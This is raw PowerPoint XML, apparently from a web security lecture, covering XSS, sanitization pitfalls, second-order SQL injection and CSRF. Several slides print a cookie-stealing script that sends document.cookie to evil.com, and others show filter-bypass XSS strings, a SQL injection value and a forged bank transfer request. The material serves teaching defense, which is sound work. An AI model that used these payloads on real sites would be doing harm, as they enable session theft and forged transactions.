              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>document.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t> = “evil.com/” + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>&lt;/script&gt;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103" y="4388489"/>
            <a:ext cx="1240078" cy="1785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614" y="2183304"/>
            <a:ext cx="1905372" cy="11090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0346" y="1503618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45046" y="2237358"/>
            <a:ext cx="1102102" cy="11021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341" y="2213328"/>
            <a:ext cx="1905372" cy="11090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613" y="224713"/>
            <a:ext cx="1240078" cy="178571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070648" y="4871041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lapdonline.org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78691" y="772008"/>
            <a:ext cx="10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evil.com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68543" y="22471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70648" y="5318254"/>
            <a:ext cx="1102102" cy="110210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417906" y="1642610"/>
            <a:ext cx="272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evil.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>f9geiv33knv141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81987" y="499037"/>
            <a:ext cx="2056427" cy="715089"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -23541"/>
              <a:gd name="adj2" fmla="val 106226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Session token for lapdonline.org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255524" y="3310567"/>
            <a:ext cx="683089" cy="10244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724400" y="3434364"/>
            <a:ext cx="286279" cy="7312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49338" y="3547841"/>
            <a:ext cx="3556699" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="leftArrowCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 19760"/>
              <a:gd name="adj2" fmla="val 25000"/>
              <a:gd name="adj3" fmla="val 28930"/>
              <a:gd name="adj4" fmla="val 8756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Comment with text:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>document.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t> = “evil.com/” + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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044311" y="3434364"/>
            <a:ext cx="287274" cy="8061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070648" y="1633056"/>
            <a:ext cx="551051" cy="7291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350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1" grpId="0"/>
      <p:bldP spid="32" grpId="0" animBg="1"/>
      <p:bldP spid="3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947440" y="1975597"/>
            <a:ext cx="1841002" cy="6096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06998" y="1975597"/>
            <a:ext cx="1841002" cy="6096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Attacker</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Elbow Connector 7"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="7" idx="0"/>
            <a:endCxn id="6" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="4497720" y="-394624"/>
            <a:ext cx="12700" cy="474044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7479" y="1289797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 Send XSS attack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355998" y="2585197"/>
            <a:ext cx="8432002" cy="2296068"/>
            <a:chOff x="355998" y="2585197"/>
            <a:chExt cx="8432002" cy="2296068"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Rounded Rectangle 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="355998" y="3505200"/>
              <a:ext cx="1841002" cy="6096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Victim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552998" y="3505200"/>
              <a:ext cx="1841002" cy="6096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Victim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749998" y="3505200"/>
              <a:ext cx="1841002" cy="6096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Victim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46998" y="3505200"/>
              <a:ext cx="1841002" cy="6096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Victim</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="18" name="Straight Arrow Connector 17"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="6" idx="2"/>
              <a:endCxn id="13" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="1276499" y="2585197"/>
              <a:ext cx="5591442" cy="9200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2"/>
              <a:endCxn id="14" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="3473499" y="2585197"/>
              <a:ext cx="3394442" cy="9200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2"/>
              <a:endCxn id="15" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="5670499" y="2585197"/>
              <a:ext cx="1197442" cy="9200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2"/>
              <a:endCxn id="16" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6867941" y="2585197"/>
              <a:ext cx="999558" cy="9200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991606" y="4419600"/>
              <a:ext cx="51607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2. Victim exploited just by visiting site</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2400" dirty="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38002" y="2302614"/>
            <a:ext cx="797302" cy="7973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62856" y="2381295"/>
            <a:ext cx="661102" cy="66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81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3429000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Main problem: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>unsanitized</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>input is evaluated by the server or another user’s browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Main solution: sanitize input to remove “code” from the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09600" y="5105400"/>
            <a:ext cx="7981950" cy="914400"/>
            <a:chOff x="609600" y="5105400"/>
            <a:chExt cx="7981950" cy="9144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5105400"/>
              <a:ext cx="3581400" cy="914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Don’t roll your own crypto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010150" y="5105400"/>
              <a:ext cx="3581400" cy="914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Don’t write your own sanitization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3834962" y="5178972"/>
              <a:ext cx="1447800" cy="767255"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 38177"/>
                <a:gd name="adj2" fmla="val 50000"/>
              </a:avLst>
            </a:prstGeom>
            <a:ln w="28575" cap="flat" cmpd="sng">
              <a:miter lim="800000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8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634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Sanitizing Is Not Easy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1"/>
            <a:ext cx="3810000" cy="4571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 anchorCtr="0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dirty="0" smtClean="0"/>
              <a:t>Remove cases of “&lt;script&gt;”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83221" y="2124754"/>
            <a:ext cx="6031010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scr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ipt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&gt;alert(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>scr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ipt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57200" y="2829331"/>
            <a:ext cx="4572000" cy="4571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85000" lnSpcReduction="10000"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Recursively Remove cases of “&lt;script&gt;”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128698" y="3546082"/>
            <a:ext cx="4285533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&lt;body </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>onload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>=“alert(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)”&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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483476" y="4278598"/>
            <a:ext cx="6984124" cy="4571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70000" lnSpcReduction="20000"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Recursively Remove cases of “&lt;script&gt;” and JS keywords like “alert”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254516" y="5099292"/>
            <a:ext cx="4033900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¼</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>script¾a\u006ert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(¢XSS¢)¼/script¾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6800" y="5691079"/>
            <a:ext cx="6826257" cy="733663"/>
          </a:xfrm>
          <a:prstGeom prst="bentUpArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 50000"/>
              <a:gd name="adj3" fmla="val 3216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These tend to be server/browser specific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23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“Frontier Sanitization”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321014"/>
            <a:ext cx="1240078" cy="1785712"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Arc 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5344439" y="2540152"/>
            <a:ext cx="3810000" cy="3657600"/>
          </a:xfrm>
          <a:prstGeom prst="arc">
            <a:avLst>
              <a:gd name="adj1" fmla="val 16200000"/>
              <a:gd name="adj2" fmla="val 5554325"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="63500">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:tailEnd type="none"/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="101600">
              <a:schemeClr val="accent2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329303"/>
            <a:ext cx="1905372" cy="1109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81" y="3060754"/>
            <a:ext cx="1905372" cy="11090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088655"/>
            <a:ext cx="1905372" cy="1109097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124200" y="1883851"/>
            <a:ext cx="3352800" cy="17314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43153" y="3657600"/>
            <a:ext cx="3357647" cy="5562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124200" y="4834503"/>
            <a:ext cx="3276600" cy="808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57800" y="1504116"/>
            <a:ext cx="3643290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Sanitize all input immediately</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>(SQL, XSS, bash, etc.)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Rounded Rectangle 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="2743200"/>
            <a:ext cx="7315200" cy="1447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What order should the sanitization routines be applied? SQL then XSS, XSS then SQL?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3599983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Second-Order SQL Injection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161" y="2371281"/>
            <a:ext cx="1240078" cy="1785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328" y="2323658"/>
            <a:ext cx="1339472" cy="1852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62" y="2735863"/>
            <a:ext cx="1905372" cy="1109097"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Arc 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3016775" y="1905000"/>
            <a:ext cx="2863618" cy="2971800"/>
          </a:xfrm>
          <a:prstGeom prst="arc">
            <a:avLst>
              <a:gd name="adj1" fmla="val 16200000"/>
              <a:gd name="adj2" fmla="val 5554325"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="63500">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:tailEnd type="none"/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="101600">
              <a:schemeClr val="accent2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62200" y="3290412"/>
            <a:ext cx="152400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43080" y="2190976"/>
            <a:ext cx="160020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23984" y="2921079"/>
            <a:ext cx="59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evil'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24200" y="2894804"/>
            <a:ext cx="70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evil\'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56042" y="1483399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Sanitizer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44439" y="1600200"/>
            <a:ext cx="3723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insert into sessions (username, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>sessionID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>) values (‘evil\’’, 1234) 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410200" y="2306700"/>
            <a:ext cx="16659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* from sessions where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>sessionID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t> = 1234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75961" y="3064527"/>
            <a:ext cx="160020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475961" y="3333976"/>
            <a:ext cx="160020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01987" y="3358467"/>
            <a:ext cx="77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evil'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525058" y="4439908"/>
            <a:ext cx="160020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10199" y="3690734"/>
            <a:ext cx="16659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* from users where username = ‘evil’’</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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475960" y="5162776"/>
            <a:ext cx="160020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40158" y="4766991"/>
            <a:ext cx="1665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HORRIBLE ERROR</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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780545" y="5566053"/>
            <a:ext cx="7467600" cy="7620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Sanitizing input once sometimes isn’t enough!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2137336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3" grpId="0"/>
      <p:bldP spid="25" grpId="0"/>
      <p:bldP spid="27" grpId="0"/>
      <p:bldP spid="2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Context-Specific Sanitization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22446"/>
            <a:ext cx="1240078" cy="1785712"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Arc 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6605505" y="1295400"/>
            <a:ext cx="2049546" cy="1988778"/>
          </a:xfrm>
          <a:prstGeom prst="arc">
            <a:avLst>
              <a:gd name="adj1" fmla="val 16200000"/>
              <a:gd name="adj2" fmla="val 5554325"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="63500">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:tailEnd type="none"/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="101600">
              <a:schemeClr val="accent2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29303"/>
            <a:ext cx="1905372" cy="1109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81" y="3060754"/>
            <a:ext cx="1905372" cy="11090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88655"/>
            <a:ext cx="1905372" cy="1109097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124200" y="1883851"/>
            <a:ext cx="1447800" cy="10011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43153" y="3657600"/>
            <a:ext cx="1528847" cy="152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124200" y="4724400"/>
            <a:ext cx="1447800" cy="9188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021" y="1625025"/>
            <a:ext cx="911250" cy="12600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6172200" y="2057400"/>
            <a:ext cx="914400" cy="4572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237994" y="2408086"/>
            <a:ext cx="914400" cy="4572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0800000" flipV="1">
            <a:off x="3363206" y="4169851"/>
            <a:ext cx="2808994" cy="1854352"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -13983"/>
            </a:avLst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 flipH="1">
            <a:off x="6085347" y="3894137"/>
            <a:ext cx="2049546" cy="1988778"/>
          </a:xfrm>
          <a:prstGeom prst="arc">
            <a:avLst>
              <a:gd name="adj1" fmla="val 300417"/>
              <a:gd name="adj2" fmla="val 4258914"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="63500">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:tailEnd type="none"/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="101600">
              <a:schemeClr val="accent5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733237" y="3404491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 Sanitization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836196" y="5960871"/>
            <a:ext cx="176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XSS Sanitization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1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Site Request Forgery (CSRF)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86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Recall: Session Cookies</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/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1219200" y="1905000"/>
            <a:ext cx="1447800" cy="411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6172200" y="1905000"/>
            <a:ext cx="1447800" cy="411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1" name="Text Box 8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6454250" y="1447800"/>
            <a:ext cx="883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Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55302" name="Text Box 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1396992" y="1447800"/>
            <a:ext cx="1092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Browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55303" name="Line 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2637574" y="2286000"/>
            <a:ext cx="3534626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4" name="Text Box 11"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="345248">
            <a:off x="3416300" y="1828800"/>
            <a:ext cx="214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POST/login.cgi</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55305" name="Line 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2667000" y="4495800"/>
            <a:ext cx="3505200" cy="295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6" name="Line 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="2667000" y="3048000"/>
            <a:ext cx="3505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7" name="Line 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="2667000" y="5410200"/>
            <a:ext cx="3505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8" name="Text Box 15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-321107">
            <a:off x="2651125" y="2895600"/>
            <a:ext cx="356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Set-cookie: authenticator</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55309" name="Text Box 16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="404233">
            <a:off x="3168650" y="4037381"/>
            <a:ext cx="2613025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/>
              <a:t>GET…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cookie: authenticator</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55310" name="Text Box 17"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-321107">
            <a:off x="3856038" y="5210175"/>
            <a:ext cx="11953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response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152400" y="3200400"/>
            <a:ext cx="2133600" cy="2057400"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 90576"/>
              <a:gd name="adj2" fmla="val 4537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Sent on every page request...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...intentional or not</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4145014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i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Injection flaws </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>occur when an application sends untrusted data to an interpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.” </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="r">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>--- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>OWASP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6492875"/>
            <a:ext cx="7021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www.owasp.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>index.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>/Top_10_2010-A4-Insecure_Direct_Object_References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66800" y="2811572"/>
            <a:ext cx="6779172" cy="2979627"/>
            <a:chOff x="1066800" y="2811572"/>
            <a:chExt cx="6779172" cy="2979627"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="Bent-Up Arrow 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="1066800" y="2811572"/>
              <a:ext cx="2133600" cy="2133600"/>
            </a:xfrm>
            <a:prstGeom prst="bentUpArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 19581"/>
                <a:gd name="adj2" fmla="val 25000"/>
                <a:gd name="adj3" fmla="val 25000"/>
              </a:avLst>
            </a:prstGeom>
            <a:ln w="28575" cap="flat" cmpd="sng">
              <a:miter lim="800000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969172" y="3581400"/>
              <a:ext cx="4876800" cy="2209799"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="28575" cap="flat" cmpd="sng">
              <a:miter lim="800000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L</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>ike some binary vulnerabilities, this is a result of </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1" i="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>mixing data and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2239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703" y="2759778"/>
            <a:ext cx="1240078" cy="1785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914" y="990600"/>
            <a:ext cx="1905372" cy="11090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69552" y="5364176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37024" y="4105220"/>
            <a:ext cx="1102102" cy="11021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01" y="3989640"/>
            <a:ext cx="1240078" cy="17857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04899" y="236770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bank.com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37448" y="3620308"/>
            <a:ext cx="10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evil.com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29000" y="1447800"/>
            <a:ext cx="3733800" cy="8382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1702" y="1905000"/>
            <a:ext cx="1102102" cy="110210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26208" y="1219723"/>
            <a:ext cx="304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Authenticates with bank.com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353242" y="1867319"/>
            <a:ext cx="3580958" cy="8697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81975" y="2813877"/>
            <a:ext cx="597330" cy="607454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192400" y="2367707"/>
            <a:ext cx="3733800" cy="8382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85588" y="2867589"/>
            <a:ext cx="408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transfer?amount</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>=500&amp;dest=grandson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16341" y="5244601"/>
            <a:ext cx="2751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Cookie checks out! </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Sending $500 to grandson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20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7 L 1.94444E-6 0.00023 C -0.00504 -0.00116 -0.00972 -0.00185 -0.01441 -0.00278 C -0.02552 -0.00532 -0.01042 -0.00324 -0.02413 -0.00556 C -0.02761 -0.00602 -0.0309 -0.00602 -0.03403 -0.00671 C -0.05816 -0.01134 -0.03195 -0.0081 -0.05816 -0.01065 L -0.09896 -0.01852 C -0.09896 -0.01829 -0.12743 -0.02384 -0.12743 -0.02361 L -0.13872 -0.02523 C -0.14306 -0.02639 -0.14705 -0.02824 -0.15156 -0.02917 C -0.16354 -0.03218 -0.16858 -0.03218 -0.18125 -0.0331 C -0.18542 -0.03403 -0.18976 -0.03449 -0.19393 -0.03565 C -0.2033 -0.03819 -0.2125 -0.04167 -0.22205 -0.04352 C -0.22639 -0.04468 -0.23056 -0.04491 -0.2349 -0.0463 C -0.2382 -0.04722 -0.24097 -0.04954 -0.24462 -0.05023 C -0.25313 -0.05139 -0.26163 -0.05093 -0.27014 -0.05139 C -0.28785 -0.05556 -0.26597 -0.05046 -0.28021 -0.05417 C -0.28195 -0.05463 -0.28386 -0.05486 -0.28577 -0.05532 C -0.28715 -0.05579 -0.28854 -0.05648 -0.29011 -0.05694 C -0.29636 -0.05833 -0.31389 -0.0625 -0.32101 -0.06319 L -0.33229 -0.06482 C -0.35799 -0.07269 -0.32604 -0.06319 -0.34792 -0.06875 C -0.35087 -0.06921 -0.35365 -0.07037 -0.35643 -0.0713 C -0.3592 -0.07199 -0.36181 -0.07338 -0.36493 -0.07384 L -0.37205 -0.07523 C -0.37379 -0.07593 -0.37552 -0.07732 -0.37761 -0.07778 C -0.38143 -0.0787 -0.38524 -0.07847 -0.38906 -0.07917 C -0.39028 -0.0794 -0.39167 -0.08009 -0.39323 -0.08056 C -0.39584 -0.08102 -0.39879 -0.08125 -0.40174 -0.08171 C -0.40469 -0.08241 -0.40729 -0.08357 -0.41024 -0.08449 C -0.41146 -0.08495 -0.41285 -0.08542 -0.41441 -0.08565 C -0.41615 -0.08611 -0.41823 -0.08657 -0.41997 -0.08704 C -0.44097 -0.09306 -0.4257 -0.08935 -0.43837 -0.09236 C -0.43993 -0.09329 -0.44097 -0.09421 -0.44254 -0.09491 C -0.44549 -0.09607 -0.44844 -0.09676 -0.45104 -0.09769 L -0.46389 -0.10162 L -0.47222 -0.10417 C -0.47379 -0.10463 -0.47518 -0.10556 -0.47656 -0.10556 L -0.47952 -0.10556 L -0.48629 -0.10787 " pathEditMode="relative" rAng="0" ptsTypes="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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23" y="-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629 -0.10787 L -0.00295 0.0541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67" y="810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2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703" y="2759778"/>
            <a:ext cx="1240078" cy="1785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914" y="990600"/>
